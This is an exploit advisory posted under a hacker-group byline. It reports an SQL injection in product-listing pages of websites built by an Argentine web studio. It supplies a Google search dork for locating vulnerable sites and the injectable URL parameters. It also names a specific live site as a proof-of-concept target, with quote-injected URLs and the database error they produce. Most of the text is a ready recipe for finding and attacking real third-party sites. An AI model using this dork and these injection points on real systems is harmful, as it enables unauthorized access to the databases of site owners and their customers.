#################################################################################################
# Exploit Title : Powered By invitroestudio Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/09/2018
# Vendor Homepage : invitroestudio.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered By invitroestudio'' site:ar
# Exploit :
/productos-grid.php?idsubcat=[SQL Injection]
/productos-grid.php?idsubcat=[ID-NUMBER]&marca=Taloffice&orden=[ID-NUMBER]&desde=[SQL Injection]
#################################################################################################
# Example Site =>
clipers.com.ar/productos-grid.php?idsubcat=14%27 => [ Proof of Concept ] => archive.is/D2ATZ
clipers.com.ar/productos-grid.php?idsubcat=14&marca=Taloffice&orden=3&desde=0%27
# SQL Database Error =>
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home2/cliper/public_html/productos-grid.php on line 891
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################